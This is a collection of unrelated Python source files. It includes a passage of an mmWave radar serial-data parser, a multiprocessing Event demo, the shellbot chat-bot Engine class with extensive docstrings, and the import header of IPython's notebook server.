'detectedObjects': ('plot_detected_objects', 'simple_cfar_clustering', ),
'rangeAzimuthHeatMap': ('plot_range_azimuth_heat_map', ),
'rangeDopplerHeatMap': ('plot_range_doppler_heat_map', )
}
}
# ------------------------------------------------
apps = {}
verbose = False
# ------------------------------------------------
def _read_(dat, target=sys.stdout):
target.write(dat)
target.flush()
for ver in _meta_['ver']:
for dev in _meta_['dev']:
if all((tag in dat for tag in (dev, _meta_['mss'], ver))):
return dev # reset detected
if _meta_['cli'] in dat: return (None,) # cli ready
return () # unknown state
def _init_(prt, dev, cfg, dat):
aux = serial.Serial(dat, _meta_['aux'], timeout=0.01)
taux = threading.Thread(target=_data_, args=(aux,))
taux.start()
def _conf_(cfg):
global verbose
c = dict(cfg)
p = {'log_lin': float('nan'), 'fft_comp': float('nan'), 'range_bias': float('nan')}  # placeholders; keys match the assignment below
if '_comment_' in c:
c.pop('_comment_', None) # remove entry
if '_apps_' in c:
_meta_['app'] = c['_apps_']
c.pop('_apps_', None) # remove entry
if '_settings_' in c:
rx_ant = int(c['_settings_']['rxAntennas'])
tx_ant = int(c['_settings_']['txAntennas'])
# common
if c['channelCfg']['rxMask'] is None:
c['channelCfg']['rxMask'] = 2**rx_ant - 1
if c['channelCfg']['txMask'] is None:
n = tx_ant
if n == 1: n = 0
else: n = 2 * n
c['channelCfg']['txMask'] = 1 + n
if c['channelCfg']['cascading'] is None:
c['channelCfg']['cascading'] = 0 # always 0
# range bias for post-processing
if 'rangeBias' not in c['_settings_'] or c['_settings_']['rangeBias'] is None:
c['_settings_']['rangeBias'] = 0
# range bias for pre-processing
if 'compRangeBiasAndRxChanPhase' in c:
if c['compRangeBiasAndRxChanPhase']['rangeBias'] is None:
c['compRangeBiasAndRxChanPhase']['rangeBias'] = c['_settings_']['rangeBias']
if c['compRangeBiasAndRxChanPhase']['phaseBias'] is None or \
type(c['compRangeBiasAndRxChanPhase']['phaseBias']) == list and \
len(c['compRangeBiasAndRxChanPhase']['phaseBias']) == 0:
c['compRangeBiasAndRxChanPhase']['phaseBias'] = [1, 0] * _meta_['ant'][0] * _meta_['ant'][1]
# cli output
if 'verbose' in c['_settings_'] and c['_settings_']['verbose'] is not None:
verbose = c['_settings_']['verbose']
if c['dfeDataOutputMode']['type'] is None:
c['dfeDataOutputMode']['type'] = 1 # legacy (no subframes)
if c['adcCfg']['adcBits'] is None:
c['adcCfg']['adcBits'] = 2 # 16 bit
log_lin_scale = 1.0 / 512
if num_tx_elev_antenna(c) == 1: log_lin_scale = log_lin_scale * 4.0 / 3 # MMWSDK-439
fft_scale_comp_1d = fft_doppler_scale_compensation(32, num_range_bin(c))
fft_scale_comp_2d = 1
fft_scale_comp = fft_scale_comp_2d * fft_scale_comp_1d
p['log_lin'], p['fft_comp'], p['range_bias'] = log_lin_scale, fft_scale_comp, c['_settings_']['rangeBias']
c.pop('_settings_', None) # remove entry
return c, p
def _proc_(cfg, par, err={1: 'miss', 2: 'exec', 3: 'plot'}):
global apps
for _, app in apps.items(): app.kill()
apps.clear()
for cmd, app in _meta_['app'].items():
if type(app) not in (list, tuple): app = (app,)
for item in app:
if cmd in cfg['guiMonitor'] and cfg['guiMonitor'][cmd] == 1 and item is not None:
if item not in apps:
apps[item], values = exec_app(item, (cfg, par, ))
if values is None: values = []
code = apps[item].poll()
if code is None:
print_log(item, values)
tapp = threading.Thread(target=_grab_, args=(item,))
tapp.start()
else:
print_log(item, values, RuntimeError(err[code]))
def _pipe_(dat):
for tag in apps:
if apps[tag] is None: continue
try:
apps[tag].stdin.write(str.encode(dat + '\n'))
apps[tag].stdin.flush()
except Exception as e:
print_log(e, sys._getframe(), tag)
apps[tag].kill()
apps[tag] = None
def _grab_(tag):
try:
while True:
line = apps[tag].stderr.readline()
if line:
line = line.decode('latin-1')
print_log(None, tag, line.strip())
except:
pass
# ------------------------------------------------
def _data_(prt): # observe auxiliary port and process incoming data
if not prt.timeout:
raise TypeError('no timeout for serial port provided')
input, output, sync, size = {'buffer': b''}, {}, False, _meta_['blk']
while True:
try:
data = prt.read(size)
input['buffer'] += data
if data[:len(_meta_['seq'])] == _meta_['seq']: # check for magic sequence
if len(output) > 0:
plain = json.dumps(output)
_pipe_(plain)
if verbose:
print(plain, file=sys.stdout, flush=True) # print output to stdout
input['buffer'] = data
input['blocks'] = -1
input['address'] = 0
input['values'] = 0
input['other'] = {}
output = {}
sync = True # very first frame in the stream was seen
if sync:
flen = 0
while flen < len(input['buffer']): # keep things finite
flen = len(input['buffer'])
aux_buffer(input, output) # do processing of captured bytes
except serial.serialutil.SerialException:
return # leave thread
except Exception as e:
print_log(e, sys._getframe())
# ------------------------------------------------
def aux_buffer(input, output, head=36, indices={
1: 'detected_points', 2: 'range_profile', 3: 'noise_profile',
4: 'azimuth_static', 5: 'range_doppler', 6: 'stats', 7: 'side_info'}):
def aux_head(dat, n=head):
m = dat[ 0: 8]
v = intify(dat[ 8:12], 10)
l = intify(dat[12:16])
d = intify(dat[16:20], 10)
f = intify(dat[20:24])
t = intify(dat[24:28])
o = intify(dat[28:32])
s = intify(dat[32: n])
return n, v, l, d, f, t, o, s
def aux_struct(dat, n=8):
t = intify(dat[ 0: 4])
l = intify(dat[ 4: n])
return n, t, l // 2
def aux_descriptor(dat, n=4): # descriptor for detected points/objects
o = intify(dat[ 0: 2])
q = intify(dat[ 2: n])
return n, o, q
def aux_object(dat, oth, n=12): # detected points/objects
ri = intify(dat[ 0: 2]) # range index
di = intify(dat[ 2: 4]) # Doppler index
if di > 32767: di -= 65536
di = -di # circular shifted fft bins
p = intify(dat[ 4: 6]) # Doppler peak value
x = intify(dat[ 6: 8])
y = intify(dat[ 8:10])
z = intify(dat[10: n])
if x > 32767: x -= 65536
if y > 32767: y -= 65536
if z > 32767: z -= 65536
qfrac = 0
if 'qfrac' in oth: qfrac = oth['qfrac'] # q-notation is used
x = q_to_dec(x, qfrac)
y = q_to_dec(y, qfrac)
z = q_to_dec(z, qfrac)
return n, ri, di, p, x, y, z
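# Worked example (assuming q_to_dec(v, q) == v / 2.0**q): with oth['qfrac'] == 9,
# a raw coordinate of 16384 decodes to 16384 / 512 = 32.0 distance units.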
def aux_profile(dat, n=2): # value of range or noise profile
v = intify(dat[ 0: n])
return n, v
def aux_heatmap(dat, sgn, n=2): # value for heatmaps
v = intify(dat[ 0: n])
if sgn and v > 32767: v -= 65536
return n, v
def aux_info(dat, n=24): # performance measures and statistical data
ifpt = intify(dat[ 0: 4])
tot = intify(dat[ 4: 8])
ifpm = intify(dat[ 8:12])
icpm = intify(dat[12:16])
afpl = intify(dat[16:20])
ifpl = intify(dat[20: n])
return n, ifpt, tot, ifpm, icpm, afpl, ifpl
# ----------
buffer, blocks, address, values, other = \
input['buffer'], input['blocks'], input['address'], input['values'], input['other']
def progress(n, block, value):
nonlocal buffer, values, address
buffer = buffer[n:]
values -= 1
if values == 0: address = 0
try:
output[block].append(value)
except:
try:
output[block][value[0]] = value[1]
except:
output[block] = value
# ----------
# 6) statistics (raw values)
if address == 6 and len(buffer) >= 24 and values > 0:
n, ifpt, tot, ifpm, icpm, afpl, ifpl = aux_info(buffer)
progress(n, indices[address], {
'interframe_processing': ifpt,
'transmit_output': tot,
'processing_margin': {
'interframe': ifpm,
'interchirp': icpm},
'cpu_load': {
'active_frame': afpl,
'interframe': ifpl}
})
# 5) range-doppler heatmap: entire, 2D, log mag range/Doppler array
while address == 5 and len(buffer) >= 2 and values > 0:
n, v = aux_heatmap(buffer, False)
progress(n, indices[address], v)
# 4) range-azimuth heatmap: azimuth data from the radar cube matrix
while address == 4 and len(buffer) >= 2 and values > 0:
n, v = aux_heatmap(buffer, True)
progress(n, indices[address], v)
# 3) 1D array of data considered “noise”
while address == 3 and len(buffer) >= 2 and values > 0:
n, v = aux_profile(buffer)
progress(n, indices[address], q_to_db(v))
# 2) 1D array of log mag range ffts – i.e. the first column of the log mag range-Doppler matrix
while address == 2 and len(buffer) >= 2 and values > 0:
n, v = aux_profile(buffer)
progress(n, indices[address], q_to_db(v))
# 1b) object detection
while address == 1 and len(buffer) >= 12 and values > 0:
n, r, d, p, x, y, z = aux_object(buffer, other)
progress(n, indices[address], ('{},{}'.format(r, d), {'v': p, 'x': x, 'y': y, 'z': z}))
# ----------
# 1a) object detection descriptor
if address == 1 and len(buffer) >= 4 and values == 0:
n, o, q = aux_descriptor(buffer)
buffer = buffer[n:]
values = o
other['qfrac'] = q
# 0b) segment
if address == 0 and len(buffer) >= 8 and blocks > 0:
n, address, values = aux_struct(buffer)
buffer = buffer[n:]
if address == 1: values = 0
blocks -= 1
if address in (1, ):
output[indices[address]] = {}
elif address in (2, 3, 4, 5, ):
output[indices[address]] = []
elif address in (6, ):
output[indices[address]] = None
# 0a) header
if address == 0 and len(buffer) >= head and blocks == -1:
n, v, l, d, f, t, o, s = aux_head(buffer)
buffer = buffer[n:]
blocks = s
output['header'] = {'version': v, 'length': l, 'platform': d, 'number': f, 'time': t, 'objects': o, 'blocks': s}
# ----------
input['buffer'] = buffer
input['blocks'] = blocks
input['address'] = address
input['values'] = values
input['other'] = other
|
fc_2015_04_25.py
|
#!/usr/bin/env python3
# imports go here
import multiprocessing
import time
#
# Free Coding session for 2015-04-25
# Written by Matt Warren
#
def wait_for_event(e):
print("waiting")
e.wait()
print("got event")
def wait_for_event_timeout(e, t):
print("wait for timeout")
e.wait(t)
print("event timeout set", e.is_set())
if __name__ == '__main__':
e = multiprocessing.Event()
w1 = multiprocessing.Process(name='block', target=wait_for_event, args=(e,))
w1.start()
w2 = multiprocessing.Process(name='non-block', target=wait_for_event_timeout, args=(e, 2))
w2.start()
print('waiting before calling set')
time.sleep(3)
e.set()
print('event set')
|
engine.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from multiprocessing import Process, Queue
from six import string_types
import sys
import time
import yaml
import weakref
from .bot import ShellBot
from .bus import Bus
from .context import Context
from .i18n import _, localization as l10n
from .lists import ListFactory
from .listener import Listener
from .observer import Observer
from .routes.wrapper import Wrapper
from .server import Server
from .shell import Shell
from .spaces import SpaceFactory
from .speaker import Speaker
from .stores import StoreFactory
class Engine(object):
"""
Powers multiple bots
The engine manages the infrastructure that is used across multiple
bots acting in multiple spaces. It is made of an extensible set of
components that share the same context, that is, configuration settings.
Shellbot allows the creation of bots with a given set of commands.
Each bot instance is bonded to a single chat space. The chat space can be
either created by the bot itself, or the bot can join an existing space.
The first use case is suited to situations where a collaboration space is created
for semi-automated interactions between humans and machines.
In the example below, the bot controls the entire life cycle of the chat
space. A chat space is created when the program is launched. And it is
deleted when the program is stopped.
Example of programmatic chat space creation::
from shellbot import Engine, ShellBot, Context, Command
Context.set_logger()
# create a bot and load command
#
class Hello(Command):
keyword = 'hello'
information_message = u"Hello, World!"
engine = Engine(command=Hello(), type='spark')
# load configuration
#
engine.configure()
# create a chat space, or connect to an existing one
# settings of the chat space are provided
# in the engine configuration itself
#
engine.bond(reset=True)
# run the engine
#
engine.run()
# delete the chat channel when the engine is stopped
#
engine.dispose()
A second interesting use case is when a bot is invited to an existing chat
space. On such an event, a new bot instance can be created and bonded
to the chat space.
Example of invitation to a chat space::
def on_enter(self, channel_id):
bot = engine.get_bot(channel_id=channel_id)
The engine is configured by setting values in the context that is attached
to it. This is commonly done by loading the context with a dict before the
creation of the engine itself, as in the following example::
context = Context({
'bot': {
'on_enter': 'You can now chat with Batman',
'on_exit': 'Batman is now quitting the channel, bye',
},
'server': {
'url': 'http://d9b62df9.ngrok.io',
'hook': '/hook',
},
})
engine = Engine(context=context)
engine.configure()
Please note that the configuration is checked and actually used on the
call to ``engine.configure()``, rather than on initialisation itself.
When configuration statements have been stored in a separate text file
in YAML format, then the engine can be initialised with an empty context,
and configuration is loaded afterwards.
Example::
engine = Engine()
engine.configure_from_path('/opt/shellbot/my_bot.yaml')
When no configuration is provided to the engine, then default settings
are considered for the engine itself, and for various components.
For example, for a basic engine interacting in a Cisco Spark channel::
engine = Engine(type='spark')
engine.configure()
When no indication is provided at all, the engine loads a space of type
'local'.
So, in other terms::
engine = Engine()
engine.configure()
is strictly equivalent to::
engine = Engine('local')
engine.configure()
In principle, the configuration of the engine is set once for the full
life of the instance. This being said, some settings can be changed
globally with the member function `set()`. For example::
engine.set('bot.on_banner', 'Hello, I am here to help')
"""
DEFAULT_SETTINGS = {
'bot': {
'banner.text': '$BOT_BANNER_TEXT',
'banner.content': '$BOT_BANNER_CONTENT',
'banner.file': '$BOT_BANNER_FILE',
'on_enter': '$BOT_ON_ENTER',
'on_exit': '$BOT_ON_EXIT',
},
}
def __init__(self,
context=None,
settings={},
configure=False,
mouth=None,
ears=None,
fan=None,
space=None,
type=None,
server=None,
store=None,
command=None,
commands=None,
driver=ShellBot,
machine_factory=None,
updater_factory=None,
preload=0,
):
"""
Powers multiple bots
:param context: Data shared across engine components
:type context: Context
:param settings: Configuration settings to apply
:type settings: dict
:param configure: Check configuration on initialisation
:type configure: False (the default) or True
:param mouth: For asynchronous outbound to the chat space
:type mouth: Queue
:param ears: For asynchronous inbound from the chat space
:type ears: Queue
:param fan: For asynchronous audit of the chat space
:type fan: Queue
:param type: Chat space to load for this engine. Defaults to 'local'
:type type: str
:param space: Chat space to be used by this engine
:type space: Space
:param server: Web server to be used by this engine
:type server: Server
:param command: A command to initialize the shell
:type command: str or Command
:param commands: A list of commands to initialize the shell
:type commands: list of str, or list of Command
:param driver: Instantiated for every new bot
:type driver: class
:param machine_factory: Provides a state machine for each bot
:type machine_factory: MachineFactory
:param updater_factory: Provides an updater for an audited channel
:type updater_factory: UpdaterFactory
:param preload: Number of existing bots to preload
:type preload: int
If a chat type is provided, e.g., 'spark', then one space instance is
loaded from the SpaceFactory. Else a space of type 'local' is used.
Example::
engine = Engine(type='spark')
There is also an option to inject a pre-existing space. This can be
useful for testing purposes, or for similar advanced usage.
Example::
my_space = MySpecialSpace( ... )
engine = Engine(space=my_space)
"""
self.context = context if context else Context()
l10n.context = self.context
self.mouth = mouth
self.speaker = Speaker(engine=self)
self.ears = ears
self.listener = Listener(engine=self)
self.fan = fan
self.observer = Observer(engine=self)
self.registered = {
'bond': [], # connected to a channel
'dispose': [], # channel will be destroyed
'start': [], # starting bot services
'stop': [], # stopping bot services
'message': [], # message received (with message)
'join': [], # joining a space (with person)
'leave': [], # leaving a space (with person)
'enter': [], # invited to a space (for the bot)
'exit': [], # kicked off from a space (for the bot)
'inbound': [], # other event received from space (with event)
}
self.bots = {}
self.bots_to_load = set() # for bots created before the engine runs
assert space is None or type is None # use only one
if space:
self.space = space
elif type:
self.space = SpaceFactory.get(type=type)
else:
self.space = SpaceFactory.get(type='local')
self.space.context = self.context
self.server = server
self.shell = Shell(engine=self)
if configure or settings:
self.configure(settings)
if commands:
self.load_commands(commands)
if command:
self.load_command(command)
self.driver = driver if driver else ShellBot
self.machine_factory = machine_factory
self.updater_factory = updater_factory
assert preload >= 0
self.preload = preload
def configure_from_path(self, path="settings.yaml"):
"""
Reads configuration information
:param path: path to the configuration file
:type path: str
The function loads configuration from the file and from the
environment. Port number can be set from the command line.
"""
logging.info(u"Loading configuration")
logging.info(u"- from '{}'".format(path))
with open(path, 'r') as stream:
self.configure_from_file(stream)
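# Minimal settings file sketch (illustrative, re-using keys shown elsewhere in this class):
#
#     # settings.yaml
#     bot:
#       on_enter: 'You can now chat with Batman'
#       on_exit: 'Batman is now quitting the channel, bye'
#     server:
#       url: 'http://d9b62df9.ngrok.io'
#       hook: '/hook'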
def configure_from_file(self, stream):
"""
Reads configuration information
:param stream: the handle that contains configuration information
:type stream: file
The function loads configuration from the file and from the
environment. Port number can be set from the command line.
"""
try:
settings = yaml.safe_load(stream)  # safe_load: settings never require arbitrary object construction
except Exception as feedback:
logging.error(feedback)
raise Exception(u"Unable to load valid YAML settings")
self.configure(settings=settings)
def configure(self, settings={}):
"""
Checks settings
:param settings: configuration information
:type settings: dict
If no settings are provided, and the context is empty, then
``self.DEFAULT_SETTINGS`` and ``self.space.DEFAULT_SETTINGS``
are used instead.
"""
self.context.apply(settings)
if self.context.is_empty:
self.context.apply(self.DEFAULT_SETTINGS)
self.context.apply(self.space.DEFAULT_SETTINGS)
self.check()
if (self.server is None
and self.get('server.binding') is not None):
logging.debug(u"Adding web server")
self.server = Server(context=self.context, check=True)
self.space.ears = self.ears
self.space.configure()
self.space.connect()
self.register('start', self.space)
self.register('stop', self.space)
self.list_factory = ListFactory(self.context)
self.list_factory.configure()
self.shell.configure()
self.bus = Bus(self.context)
self.bus.check()
self.publisher = self.bus.publish()
def check(self):
"""
Checks settings of the engine
This function reads the keys under ``bot`` and updates
the context accordingly.
Example::
context = Context({
'bot': {
'on_enter': 'You can now chat with Batman',
'on_exit': 'Batman is now quitting the channel, bye',
},
'server': {
'url': 'http://d9b62df9.ngrok.io',
'hook': '/hook',
},
})
engine = Engine(context=context)
engine.check()
"""
self.context.check('bot.banner.text', filter=True)
self.context.check('bot.banner.content', filter=True)
self.context.check('bot.banner.file', filter=True)
self.context.check('bot.on_enter', filter=True)
self.context.check('bot.on_exit', filter=True)
def get(self, key, default=None):
"""
Retrieves the value of one configuration key
:param key: name of the value
:type key: str
:param default: default value
:type default: any serializable type is accepted
:return: the actual value, or the default value, or None
Example::
message = engine.get('bot.on_start')
This function is safe to use across multiple processes and threads.
"""
return self.context.get(key, default)
def set(self, key, value):
"""
Changes the value of one configuration key
:param key: name of the value
:type key: str
:param value: new value
:type value: any serializable type is accepted
Example::
engine.set('bot.on_start', 'hello world')
This function is safe to use across multiple processes and threads.
"""
self.context.set(key, value)
@property
def name(self):
"""
Retrieves the dynamic name of this bot
:return: The value of ``bot.name`` key in current context
:rtype: str
"""
return self.get('bot.name', _('Shelly'))
@property
def version(self):
"""
Retrieves the version of this bot
:return: The value of ``bot.version`` key in current context
:rtype: str
"""
return self.get('bot.version', _('*unknown*'))
def register(self, event, instance):
"""
Registers an object to process an event
:param event: label, such as 'start' or 'bond'
:type event: str
:param instance: an object that will handle the event
:type instance: object
This function is used to propagate events, via callbacks, to any module
that may need them.
On each event, the engine will look for a related member function
in the target instance and call it. For example for the event
'start' it will look for the member function 'on_start', etc.
Following standard events can be registered:
- 'bond' - when the bot has connected to a chat channel
- 'dispose' - when resources, including chat space, will be destroyed
- 'start' - when the engine is started
- 'stop' - when the engine is stopped
- 'join' - when a person is joining a space
- 'leave' - when a person is leaving a space
Example::
def on_init(self):
self.engine.register('bond', self) # call self.on_bond()
self.engine.register('dispose', self) # call self.on_dispose()
If the function is called with an unknown label, then a new list
of registered callbacks will be created for this event. Therefore the
engine can be used for the dispatching of any custom event.
Example::
self.engine.register('input', processor) # for processor.on_input()
...
received = 'a line of text'
self.engine.dispatch('input', received)
Registration uses weak references, so registered objects can be deleted
elsewhere without having to be unregistered first.
"""
logging.debug(u"Registering to '{}' dispatch".format(event))
assert event
assert isinstance(event, string_types)
if event not in self.registered.keys():
self.registered[event] = []
name = 'on_' + event
callback = getattr(instance, name)
assert callable(callback)  # ensure the instance implements a handler for this event
handle = weakref.proxy(instance)
self.registered[event].append(handle)
if len(self.registered[event]) > 1:
logging.debug(u"- {} objects registered to '{}'".format(
len(self.registered[event]), event))
else:
logging.debug(u"- 1 object registered to '{}'".format(event))
def dispatch(self, event, **kwargs):
"""
Triggers objects that have registered to some event
:param event: label of the event
:type event: str
Example::
def on_bond(self):
self.dispatch('bond', bot=this_bot)
For each registered object, the function will look for a related member
function and call it. For example for the event
'bond' it will look for the member function 'on_bond', etc.
Dispatch uses weak references, so registered objects may have been deleted
in the meantime (see the ReferenceError handling below).
"""
assert event in self.registered.keys() # avoid unknown event type
if len(self.registered[event]) > 1:
logging.debug(u"Dispatching '{}' to {} objects".format(
event, len(self.registered[event])))
elif len(self.registered[event]) > 0:
logging.debug(u"Dispatching '{}' to 1 object".format(event))
else:
logging.debug(u"Dispatching '{}', nothing to do".format(event))
return
name = 'on_' + event
for handle in self.registered[event]:
try:
callback = getattr(handle, name)
callback(**kwargs)
except ReferenceError:
logging.debug(u"- registered object no longer exists")
def load_commands(self, *args, **kwargs):
"""
Loads commands for this bot
This function is a convenient proxy for the underlying shell.
"""
self.shell.load_commands(*args, **kwargs)
def load_command(self, *args, **kwargs):
"""
Loads one command for this bot
This function is a convenient proxy for the underlying shell.
"""
self.shell.load_command(*args, **kwargs)
def hook(self, server=None):
"""
Connects this engine with back-end API
:param server: web server to be used
:type server: Server
This function adds a route to the provided server, and
asks the back-end service to send messages there.
"""
if server is not None:
logging.debug('Adding hook route to web server')
server.add_route(
Wrapper(callable=self.get_hook(),
route=self.context.get('server.hook', '/hook')))
if (self.context.get('server.binding') is not None
and self.context.get('server.url') is not None):
self.space.register(
hook_url=self.context.get('server.url')
+ self.context.get('server.hook', '/hook'))
def get_hook(self):
"""
Provides the hooking function to receive messages from Cisco Spark
"""
return self.space.webhook
def run(self, server=None):
"""
Runs the engine
:param server: a web server
:type server: Server
If a server is provided, it is run in the background. A server could
also have been provided during initialisation, or loaded
during configuration check.
If no server instance is available, a loop is started
to fetch messages in the background.
In both cases, this function does not return, except on interrupt.
"""
if server is None:
server = self.server
self.start()
self.hook(server=server)
if server is None:
self.space.run()
else:
p = Process(target=server.run)
p.daemon = True
p.start()
self._server_process = p
try:
self._server_process.join()
except KeyboardInterrupt:
logging.error(u"Aborted by user")
self.stop()
def start(self):
"""
Starts the engine
"""
logging.warning(u'Starting the bot')
for channel in self.space.list_group_channels(quantity=self.preload):
self.bots_to_load.add(channel.id) # handled by the listener
if self.mouth is None:
self.mouth = Queue()
if self.ears is None:
self.ears = Queue()
self.space.ears = self.ears
if self.fan is None and self.updater_factory:
self.fan = Queue()
self.space.fan = self.fan
self.start_processes()
self.on_start()
self.dispatch('start')
def start_processes(self):
"""
Starts the engine processes
This function starts a separate process for each
main component of the architecture: listener, speaker, etc.
"""
self.context.set('general.switch', 'on')
self.speaker.start()
self.listener.start()
self.publisher.start()
self.observer.start()
def on_start(self):
"""
Does additional stuff when the engine is started
Provide your own implementation in a sub-class where required.
"""
pass
def stop(self):
"""
Stops the engine
This function changes in the context a specific key that is monitored
by bot components.
"""
logging.warning(u'Stopping the bot')
self.dispatch('stop')
self.on_stop()
logging.debug(u"Switching off")
self.context.set('general.switch', 'off')
time.sleep(1)
try:
self.listener.join()
except AssertionError:
pass # if listener process was not started
def on_stop(self):
"""
Does additional stuff when the engine is stopped
Provide your own implementation in a sub-class where required.
Note that some processes may have been killed at the moment of this
function call. This is likely to happen when end-user hits Ctl-C on
the keyboard for example.
"""
pass
def bond(self,
title=None,
reset=False,
participants=None,
**kwargs):
"""
Bonds to a channel
:param title: title of the target channel
:type: title: str
:param reset: if True, delete previous channel and re-create one
:type reset: bool
:param participants: the list of initial participants (optional)
:type participants: list of str
:return: Channel or None
This function creates a channel, or connect to an existing one.
If no title is provided, then the generic title configured for the
underlying space is used instead.
For example::
channel = engine.bond('My crazy channel')
if channel:
...
Note: this function asks the listener to load a new bot in its cache
on successful channel creation or lookup. In other terms, this function
can be called safely from any process for the creation of a channel.
"""
if not title:
title=self.space.configured_title()
logging.debug(u"Bonding to channel '{}'".format(title))
channel = self.space.get_by_title(title=title)
if channel and not reset:
logging.debug(u"- found existing channel")
# ask explicitly the listener to load the bot
if self.ears is None:
self.ears = Queue()
self.space.ears = self.ears
else:
if channel and reset:
logging.debug(u"- deleting existing channel")
self.space.delete(id=channel.id)
logging.debug(u"- creating channel '{}'".format(title))
channel = self.space.create(title=title, **kwargs)
if not channel:
logging.error("Unable to create channel")
return
if not participants:
participants = self.space.context.get('space.participants', [])
self.space.add_participants(id=channel.id, persons=participants)
self.bots_to_load.add(channel.id) # handled by the listener
return channel
def dispose(self,
title=None,
**kwargs):
"""
Destroys a named channel
:param title: title of the target channel
:type: title: str
"""
if not title:
title=self.space.configured_title()
logging.debug(u"Disposing channel '{}'".format(title))
channel = self.space.get_by_title(title=title)
if channel:
self.space.delete(id=channel.id, **kwargs)
def enumerate_bots(self):
"""
Enumerates all bots
"""
for id in self.bots.keys():
yield self.bots[id]
def get_bot(self, channel_id=None, **kwargs):
"""
Gets a bot by id
:param channel_id: The unique id of the target chat space
:type channel_id: str
:return: a bot instance, or None
This function receives the id of a chat space, and returns
the related bot.
If no id is provided, then the underlying space is asked to provide
with a default channel, as set in overall configuration.
Note: this function should not be called from multiple processes,
because this would create one bot per process. Use the function
``engine.bond()`` for the creation of a new channel.
"""
if not channel_id:
channel = self.bond(**kwargs)
if not channel:
return
channel_id = channel.id
logging.debug(u"Getting bot {}".format(channel_id))
if channel_id and channel_id in self.bots.keys():
logging.debug(u"- found matching bot instance")
return self.bots[channel_id]
bot = self.build_bot(id=channel_id, driver=self.driver)
if bot and bot.id:
logging.debug(u"- remembering bot {}".format(bot.id))
self.bots[bot.id] = bot
self.set('bots.ids', list(self.bots.keys()))  # for the observer; list() keeps the value serializable
bot.bond()
bot.on_enter()
return bot
def build_bot(self, id=None, driver=ShellBot):
"""
Builds a new bot
:param id: The unique id of the target space
:type id: str
:return: a ShellBot instance, or None
This function receives the id of a chat space, and returns
the related bot.
"""
logging.debug(u"- building bot instance")
bot = driver(engine=self, channel_id=id)
self.initialize_store(bot=bot)
bot.machine = self.build_machine(bot=bot)
self.on_build(bot)
return bot
def on_build(self, bot):
"""
Extends the building of a new bot instance
:param bot: a new bot instance
:type bot: ShellBot
Provide your own implementation in a sub-class where required.
Example::
on_build(self, bot):
bot.secondary_machine = Input(...)
"""
pass
def build_store(self, channel_id=None):
"""
Builds a store for this bot
:param channel_id: Identifier of the target chat space
:type channel_id: str
:return: a Store instance, or None
This function receives an identifier, and returns
a store bound to it.
"""
logging.debug(u"- building data store")
return StoreFactory.get(type='memory')
def initialize_store(self, bot):
"""
Copies engine settings to the bot store
"""
logging.debug(u"Initializing bot store")
settings = self.get('bot.store', {})
if settings:
logging.debug(u"- initializing store from general settings")
for (key, value) in settings.items():
bot.store.remember(key, value)
if bot.id:
label = "store.{}".format(bot.id)
settings = self.get(label, {})
if settings:
logging.debug(u"- initializing store from bot settings")
for (key, value) in settings.items():
bot.store.remember(key, value)
def build_machine(self, bot):
"""
Builds a state machine for this bot
:param bot: The target bot
:type bot: ShellBot
:return: a Machine instance, or None
This function receives a bot, and returns
a state machine bound to it.
"""
if self.machine_factory:
logging.debug(u"- building state machine")
machine = self.machine_factory.get_machine(bot=bot)
return machine
return None
def build_updater(self, id):
"""
Builds an updater for this channel
:param id: The identifier of an audited channel
:type id: str
:return: an Updater instance, or None
This function receives the identifier of an audited channel, and returns
an updater bound to it.
"""
if self.updater_factory:
logging.debug(u"- building updater")
updater = self.updater_factory.get_updater(id=id)
return updater
return None
def on_enter(self, join):
"""
Bot has been invited to a chat space
:param join: The join event received from the chat space
:type join: Join
Provide your own implementation in a sub-class where required.
Example::
on_enter(self, join):
mailer.post(u"Invited to {}".format(join.space_title))
"""
pass
def on_exit(self, leave):
"""
Bot has been kicked off from a chat space
:param leave: The leave event received from the chat space
:type leave: Leave
Provide your own implementation in a sub-class where required.
Example::
on_exit(self, leave):
mailer.post(u"Kicked off from {}".format(leave.space_title))
"""
pass
|
notebookapp.py
|
# coding: utf-8
"""A tornado based IPython notebook server.
Authors:
* Brian Granger
"""
from __future__ import print_function
#-----------------------------------------------------------------------------
# Copyright (C) 2013 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# stdlib
import errno
import io
import json
import logging
import os
import random
import select
import signal
import socket
import sys
import threading
import time
import webbrowser
# Third party
# check for pyzmq 2.1.11
from IPython.utils.zmqrelated import check_for_zmq
check_for_zmq('2.1.11', 'IPython.html')
from jinja2 import Environment, FileSystemLoader
# Install the pyzmq ioloop. This has to be done before anything else from
# tornado is imported.
from zmq.eventloop import ioloop
ioloop.install()
# check for tornado 3.1.0
msg = "The IPython Notebook requires tornado >= 3.1.0"
try:
import tornado
except ImportError:
raise ImportError(msg)
try:
version_info = tornado.version_info
except AttributeError:
raise ImportError(msg + ", but you have < 1.1.0")
if version_info < (3, 1, 0):
raise ImportError(msg + ", but you have %s" % tornado.version)
from tornado import httpserver
from tornado import web
# Our own libraries
from IPython.html import DEFAULT_STATIC_FILES_PATH
from .base.handlers import Template404
from .log import log_request
from .services.kernels.kernelmanager import MappingKernelManager
from .services.notebooks.nbmanager import NotebookManager
from .services.notebooks.filenbmanager import FileNotebookManager
from .services.clusters.clustermanager import ClusterManager
from .services.sessions.sessionmanager import SessionManager
from .base.handlers import AuthenticatedFileHandler, FileFindHandler
from IPython.config.application import catch_config_error, boolean_flag
from IPython.core.application import BaseIPythonApplication
from IPython.core.profiledir import ProfileDir
from IPython.consoleapp import IPythonConsoleApp
from IPython.kernel import swallow_argv
from IPython.kernel.zmq.session import default_secure
from IPython.kernel.zmq.kernelapp import (
kernel_flags,
kernel_aliases,
)
from IPython.nbformat.sign import NotebookNotary
from IPython.utils.importstring import import_item
from IPython.utils.localinterfaces import localhost
from IPython.utils import submodule
from IPython.utils.traitlets import (
Dict, Unicode, Integer, List, Bool, Bytes,
DottedObjectName, TraitError,
)
